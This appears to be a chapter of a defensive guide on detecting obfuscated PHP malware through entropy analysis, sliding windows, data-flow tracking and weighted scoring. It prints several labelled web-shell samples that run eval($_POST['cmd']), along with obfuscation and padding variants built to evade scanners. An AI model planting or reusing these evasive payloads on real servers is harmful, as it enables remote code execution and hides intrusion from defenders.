Beyond signatures: How modern malware evades detection

In Chapter 4, we explored 87 malware signatures. You might think that’s enough to catch most threats. It’s not.

Modern attackers know what security scanners look for. They’ve studied signature databases, analyzed detection algorithms, and developed sophisticated techniques to fly under the radar. This chapter reveals those techniques - and how to defeat them.

The signature problem

Traditional scanners work like this:

1. Load signature database (patterns like "eval(base64_decode(")
2. Read each file
3. Match patterns against content
4. If match found → flag as malware

This approach has a fundamental flaw: attackers can read the same signature databases.

💀

The Arms Race

Every public signature database is a roadmap for attackers. For each signature published, attackers develop two new evasion techniques. This is why signature-only scanners are fighting a losing battle.

What Attackers Do

When an attacker wants to evade eval(base64_decode( detection:

// Original (detected)
eval(base64_decode('ZWNobyAiaGFja2VkIjs='));

// Evasion v1: Variable indirection
$f = 'base64_decode';
$e = 'eval';
$e($f('ZWNobyAiaGFja2VkIjs='));

// Evasion v2: String building
$func = 'bas'.'e64'.'_de'.'code';
$exec = 'ev'.'al';
$exec($func('ZWNobyAiaGFja2VkIjs='));

// Evasion v3: Array chunks (defeats even v2 signatures)
$c = ['ZWNo', 'byAi', 'aGFj', 'a2Vk', 'Ijs='];
$f = implode('', array_map('chr', [98,97,115,101,54,52,95,100,101,99,111,100,101]));
$e = implode('', array_map('chr', [101,118,97,108]));
$e($f(implode('', $c)));

Each version evades more signatures while doing the exact same thing. The behavior is identical; the appearance is different.

Enter entropy analysis

Entropy is a measure of randomness or unpredictability in data. It’s borrowed from information theory - specifically, Shannon entropy.

4.5-5.5

Normal PHP Entropy

5.8+

Obfuscated Code

<4.0

Padded/Evasion

Understanding Entropy Intuitively

Think of entropy as measuring “surprise”:

Low entropy (predictable): “AAAAAAAAAAAAAAAA” - no surprise, you know what comes next
Medium entropy (structured): “function validateUser($id)” - has patterns but variety
High entropy (random): “7hK9xQ2mL5nR8pT3” - each character is a surprise

Normal PHP code has medium entropy (4.5-5.5 on a 0-8 scale) because:

Variable names follow conventions ($user, $request)
Keywords repeat (function, return, if)
Structure is predictable (indentation, brackets)

Base64-encoded malware has high entropy (5.8+) because:

All 64 characters appear with similar frequency
No recognizable patterns
Looks like random gibberish

Shannon Entropy Formula

H(X) = -Σ p(x) × log₂(p(x))

Where:

- H(X) = entropy of the data
- p(x) = probability of character x appearing
- Σ = sum over all unique characters

For a file with 256 unique byte values appearing equally:
H = -256 × (1/256 × log₂(1/256)) = 8 bits (maximum entropy)

Why Attackers Fear Entropy Scanners

Early entropy scanners caught obfuscated malware easily:

File: malicious.php
Global Entropy: 6.7 (HIGH - SUSPICIOUS)
→ Flag for review

But attackers adapted. They developed entropy evasion techniques - ways to artificially lower their malware’s entropy to look like normal code.

The 5 entropy evasion techniques

Through extensive research, we’ve identified five primary techniques attackers use to manipulate entropy:

Technique	Method	Effect on Entropy
Comment Padding	Add voluminous repetitive comments	Lowers global entropy
Variable Name Engineering	Use predictable, long variable names	Lowers character diversity
Chunked Payload	Split payload into small pieces	Distributes high-entropy regions
String Steganography	Hide data in invisible characters	Adds entropy invisibly
Whitespace Manipulation	Add excessive whitespace	Dilutes entropy calculation

Let’s examine each one in detail.

Technique 1: Comment padding

Goal: Dilute high-entropy payload with low-entropy comments.

Comment Padding Evasion MALICIOUS CODE

<?php
/*
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* [... 500 more identical lines ...]
*/

// Configuration settings
// Configuration settings
// Configuration settings

$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');
eval($c);

/*

- End of configuration file.
- End of configuration file.
- End of configuration file.
- End of configuration file.
*/

Why it works: The malicious payload is 2 lines. The padding is 1000+ lines of repetitive, low-entropy text. The global entropy of the file drops from 6.5 to 4.8 - appearing normal.

Detection: CommentPaddingDetector

We counter this by comparing entropy with and without comments:

Indicator	Threshold	What It Means
Entropy delta	> 1.5	Big difference with/without comments
Comment ratio	> 60%	File is mostly comments
Repetition score	> 40%	Same lines repeated
Vocabulary ratio	< 15%	Very few unique words

// Detection logic
$entropyWithComments = calculateEntropy($content);
$entropyWithout = calculateEntropy(stripComments($content));
$delta = $entropyWithout - $entropyWithComments;

if ($delta > 1.5) {
    // Comments are artificially lowering entropy
    // Investigate the non-comment code!
}

ℹ️

Real Detection Numbers

In our implementation, we require at least 2 indicators with combined confidence above 40% before flagging. This prevents false positives on legitimately well-documented code.

Technique 2: Variable name engineering

Goal: Use predictable, long variable names to lower character diversity.

Variable Name Engineering MALICIOUS CODE

<?php
$temporaryDataBufferStorageVariableOne = 'ZX';
$temporaryDataBufferStorageVariableTwo = 'Zh';
$temporaryDataBufferStorageVariableThree = 'bC';
$temporaryDataBufferStorageVariableFour = 'gk';
$temporaryDataBufferStorageVariableFive = 'X1';
$temporaryDataBufferStorageVariableSix = 'BP';
$temporaryDataBufferStorageVariableSeven = 'U1';
$temporaryDataBufferStorageVariableEight = 'Rb';
$temporaryDataBufferStorageVariableNine = 'J2';
$temporaryDataBufferStorageVariableTen = 'Nt';

$resultOutputDataString =
$temporaryDataBufferStorageVariableOne .
$temporaryDataBufferStorageVariableTwo .
$temporaryDataBufferStorageVariableThree .
/_ ... continues ... _/;

$executionFunctionVariable = 'eval';
$decodeFunctionVariable = 'base64_decode';
$executionFunctionVariable($decodeFunctionVariable($resultOutputDataString));

Why it works: The long, repetitive variable names add predictable characters. Words like “temporary”, “Data”, “Buffer”, “Storage”, “Variable” appear constantly, lowering entropy.

Detection: VariableNameEngineeringDetector

Indicator	Threshold	What It Means
Average length	> 25 chars	Unusually long variable names
Very long count	> 3 variables over 40 chars	Padding behavior
Sequential patterns	> 5 numbered vars	$var1, $var2, $var3…
Repetitive affixes	> 40% same suffix/prefix	Same endings/beginnings

Known padding words we look for:

data, buffer, temp, var, string, value, content
result, output, input, param, arg, item, element

When these words appear repeatedly in variable names, suspicion increases.

Technique 3: Chunked payload distribution

Goal: Break high-entropy payload into small chunks that individually appear normal.

Chunked Payload Attack MALICIOUS CODE

<?php
// Looks like configuration data
$config = [];
$config[] = 'ZX';
$config[] = 'Zh';
$config[] = 'bC';
$config[] = 'gk';
$config[] = 'X1';
$config[] = 'BP';
$config[] = 'U1';
$config[] = 'RF';
$config[] = 'J2';
$config[] = 'Nt';
$config[] = 'ZC';
$config[] = 'dd';
$config[] = 'XS';
$config[] = 'k7';

// Reconstruction - the dangerous part
$payload = implode('', $config);
$fn = chr(101).chr(118).chr(97).chr(108); // "eval"
$fn(base64_decode($payload));

Why it works: Each 2-character chunk has low entropy. A sliding window of 256 bytes won’t see a concentrated high-entropy region. The payload is distributed across the file.

Detection: ChunkedPayloadDetector

We look for the reconstruction patterns:

Pattern	Description	Confidence
Array building	`$arr[] = 'xx';` repeated	70%
implode + eval	Reconstruction into execution	95%
implode + base64_decode	Decoding reconstructed string	90%
chr() chains	Building strings from ASCII	85%
Uniform string lengths	All strings same size	70%

// Key detection patterns
$dangerousReconstruction = [
    'base64_chunks' => '/base64_decode\s*\(\s*implode/',
    'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
    'chr_building' => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
];

🚨

AI Polymorphism Uses This

AI-generated malware heavily uses chunked payloads because each instance can have a different chunk order, different array variable names, and different reconstruction methods. This is why we focus on detecting the reconstruction, not the chunks themselves.

Technique 4: String steganography

Goal: Hide data using invisible Unicode characters or look-alike characters.

Invisible Characters

These Unicode characters are invisible but present in the string:

Character	Unicode	Name
	U+200B	Zero Width Space
‌	U+200C	Zero Width Non-Joiner
‍	U+200D	Zero Width Joiner
	U+FEFF	Byte Order Mark
	U+00AD	Soft Hyphen
⁠	U+2060	Word Joiner

Invisible Character Encoding MALICIOUS CODE

<?php
// Looks like a normal string, but contains hidden data
$message = "Hello‌‍‌‌World";  // ZWSP patterns encode binary

// Decoder extracts binary from invisible char positions
$binary = '';
for ($i = 0; $i < strlen($message); $i++) {
  $char = mb_substr($message, $i, 1);
  if ($char === "") $binary .= '0';
  if ($char === "‌") $binary .= '1';
}
// $binary could be: "01001000" = 'H' = start of payload

Homoglyphs

Characters from different scripts that look identical:

Latin	Cyrillic	They Look The Same
a	а	Yes
e	е	Yes
o	о	Yes
c	с	Yes
p	р	Yes

An attacker could write еval (Cyrillic ‘е’) instead of eval (Latin ‘e’). Signature scanners looking for eval won’t match, but PHP might still execute it.

Detection: StringSteganographyDetector

We scan for:

Invisible characters - Any ZWSP, ZWNJ, BOM, etc.
Homoglyph mixing - Cyrillic in otherwise Latin text
Mixed scripts - Latin + Cyrillic + Greek in same string
Non-printable characters - Control characters hidden in strings

Technique 5: Whitespace manipulation

Goal: Pad file with whitespace to dilute entropy.

Whitespace Padding MALICIOUS CODE

<?php

eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

Why it works: Whitespace characters (space, tab, newline) have low entropy because they’re all similar. Adding 90% whitespace drops global entropy significantly.

Detection: WhitespaceManipulationDetector

Indicator	Threshold	Meaning
Whitespace ratio	> 40%	File is mostly whitespace
Entropy delta	> 2.0	Big difference with/without whitespace
Blank line ratio	> 30%	Too many empty lines
Consecutive blanks	> 10	Suspicious padding
Low entropy regions	> 3 windows	Concentrated whitespace areas

The power of sliding window analysis

Global entropy can be manipulated. Local entropy is harder to fake.

Sliding window analysis divides a file into overlapping chunks and measures each one’s entropy:

File: malicious_padded.php (10000 bytes)

Sliding Window Configuration:
- Window size: 256 bytes
- Step: 64 bytes
- Windows analyzed: ~155

Results:
Window 0-256:    Entropy 3.2 (comments/padding)
Window 64-320:   Entropy 3.4 (comments/padding)
Window 128-384:  Entropy 3.5 (comments/padding)
...
Window 4096-4352: Entropy 6.8 ← ANOMALY! Hidden payload
Window 4160-4416: Entropy 6.7 ← ANOMALY!
...
Window 9800-10000: Entropy 3.1 (comments/padding)

Global Entropy: 4.2 (appears normal)
But: Local anomalies detected at byte 4096-4500

The global entropy looks normal (4.2), but the sliding window reveals a high-entropy region in the middle - that’s where the malicious payload is hidden.

Z-Score Anomaly Detection

We use statistical z-scores to find outliers:

// Calculate mean and standard deviation of all windows
$mean = average($windowEntropies);
$stdDev = standardDeviation($windowEntropies);

// Any window more than 2 standard deviations from mean is anomalous
foreach ($windows as $window) {
    $zScore = abs($window['entropy'] - $mean) / $stdDev;
    if ($zScore > 2.0) {
        // This region is statistically abnormal
        flagAsAnomaly($window);
    }
}

Behavioral analysis: The future

Signatures tell us what code looks like. Behavioral analysis tells us what code does.

✅

The Key Insight

No matter how an attacker obfuscates eval($_POST['cmd']), the behavior is the same: user input flows to a code execution function. We should detect the flow, not the appearance.

Data Flow Tracking

Instead of pattern matching, we track how data moves:

User Input Source        →  Transformation  →  Dangerous Sink
─────────────────────────────────────────────────────────────
$_GET['x']               →  base64_decode   →  eval()
$_POST['data']           →  decrypt()       →  unserialize()
$_REQUEST['cmd']         →  (none)          →  system()
$_COOKIE['token']        →  gzinflate()     →  assert()

If data flows from any user input to any dangerous sink, we flag it - regardless of how the code looks.

Why This Defeats AI Polymorphism

AI-generated malware changes its appearance every 15-60 seconds:

Variable names randomized
Function order shuffled
String encoding varies
Comment patterns change

But the behavior stays the same. The malware still needs to:

Receive attacker commands (input)
Execute those commands (sink)

Behavioral analysis catches every variant.

Weighted scoring: Combining everything

No single technique is perfect. We combine multiple signals:

Component	Weight	What It Measures
Signature matches	35%	Known malware patterns
Behavioral analysis	25%	Data flow to dangerous sinks
Entropy analysis	15%	Statistical anomalies
Structural analysis	10%	Code structure oddities
Context analysis	15%	File location, naming

Context Modifiers

Not all detections are equal. We adjust scores based on context:

Context	Modifier	Reason
`vendor/`	-40%	Third-party code, expected patterns
`storage/framework/views/`	-50%	Compiled Blade templates
`bootstrap/cache/`	-45%	Framework cache files
`public/uploads/`	+40%	PHP shouldn’t be here
`.hidden/`	+35%	Suspicious directory
Random filename	+20%	`x7kd92.php` is suspicious

Confidence Thresholds

Based on final score, we recommend actions:

Confidence	Action	Automated?
≥ 85%	QUARANTINE - Move to isolation, alert admin	Yes
65-84%	REVIEW - Flag for manual inspection	No
40-64%	MONITOR - Add to watchlist	No
< 40%	CLEAN - No action needed	-

The 15-dimensional feature vector

For advanced analysis, we compute 15 statistical features:

Entropy Features (3)

Global entropy
Entropy variance across windows
Entropy range (max - min)

Character Distribution (4)

Printable character ratio
Alphabetic ratio
Digit ratio
Special character ratio

Code Metrics (3)

Average line length
Maximum line length
Blank line ratio

String Analysis (2)

Long string count (strings over 100 chars)
Base64 likelihood score

Function Analysis (3)

Dangerous function count
Obfuscation indicator count
Variable function call count

This 15-dimensional vector provides a fingerprint of the file that’s difficult to manipulate without changing actual behavior.

Practical implementation

Here’s how our detection pipeline works:

Input: suspicious.php
         │
         ▼
┌─────────────────────────────┐
│  1. Quick Filters           │  Skip: >1MB, non-PHP, vendor/
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  2. Signature Scan          │  87 patterns from Chapter 4
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  3. Entropy Analysis        │  5 evasion detectors
│  ├─ CommentPadding          │
│  ├─ VariableNameEngineering │
│  ├─ ChunkedPayload          │
│  ├─ StringSteganography     │
│  └─ WhitespaceManipulation  │
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  4. Behavioral Analysis     │  Data flow tracking
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  5. Weighted Scoring        │  Combine all signals
│  + Context Modifiers        │  Adjust for location
└──────────────┬──────────────┘
               │
               ▼
┌─────────────────────────────┐
│  6. Recommendation          │  QUARANTINE/REVIEW/MONITOR/CLEAN
└─────────────────────────────┘

Summary

Signatures are necessary but insufficient. Modern malware uses sophisticated evasion techniques:

Evasion Techniques

Statistical Features

Key takeaways:

Comment padding, variable engineering, and whitespace manipulation artificially lower entropy
Chunked payloads distribute high-entropy content across the file
String steganography hides data in invisible characters
Sliding window analysis catches local anomalies even when global entropy looks normal
Behavioral analysis detects what code does, not what it looks like
Weighted scoring combines multiple signals for accurate detection
Context modifiers prevent false positives in legitimate framework code

The lesson is clear: layers of defense, not single techniques.

Next: Chapter 6 - The 12 CVEs Every Laravel Developer Must Know

Entropy analysis catches obfuscation. But what about vulnerabilities in Laravel itself? The next chapter covers the critical CVEs every Laravel developer must patch.